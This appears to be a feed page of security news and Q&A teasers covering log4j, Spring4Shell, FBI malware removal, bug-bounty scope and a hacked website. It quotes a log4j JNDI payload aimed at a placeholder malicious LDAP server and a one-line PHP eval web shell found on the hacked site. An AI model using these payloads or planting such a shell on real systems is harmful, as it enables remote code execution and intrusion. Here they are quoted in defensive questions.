New York Times article about FBI secretly removing malware from U.S. corporate servers – would this indicate they have a government backdoor?

New York times just ran an article titled "U.S. Says It Secretly Removed Malware Worldwide, Pre-empting Russian Cyberattacks" that stated

The United States said on Wednesday that it had secretly removed
malware from computer net… Continue reading New York Times article about FBI secretly removing malware from U.S. corporate servers – would this indicate they have a government backdoor?

‘Spring4Shell’ bug in framework for Java programming draws widespread warnings

Web applications created in the Spring platform could leave users open to remote code execution, CISA and others are warning.

The post ‘Spring4Shell’ bug in framework for Java programming draws widespread warnings appeared first on CyberScoop.

Continue reading ‘Spring4Shell’ bug in framework for Java programming draws widespread warnings

Does the log4j RCE vulnerability run even if the message is just a part of the logged string?

Does the JNDI URL need to be the full string being logged or could it be just a part of a logged string?
For example, if the code contains:

paramGivenFromOutside = "${jndi:ldap://maliciousServer:1389/maliciousApp}";
logger.debug… Continue reading Does the log4j RCE vulnerability run even if the message is just a part of the logged string?

Can I escalate a main domain SSTI/RCE to all the subdomains belonging to that domain?

I’m a newbie ethical hacker and bug bounty hunter. Lets, assume my target is somethingtohack.com, the thing is the company’s scope defines that the main domain is out of scope, but subdomains like subdomain.somethingtohack.com are in scope… Continue reading Can I escalate a main domain SSTI/RCE to all the subdomains belonging to that domain?

Need guidance on detecting how a hacked file got upload on my website [duplicate]

On my website I found a file containing this code
<?php if(isset($_POST[z]))eval($_POST[z]);?>

It’s my understanding that the hacker is using this to execute any PHP command send via a POST request.
I’m trying to see how this file g… Continue reading Need guidance on detecting how a hacked file got upload on my website [duplicate]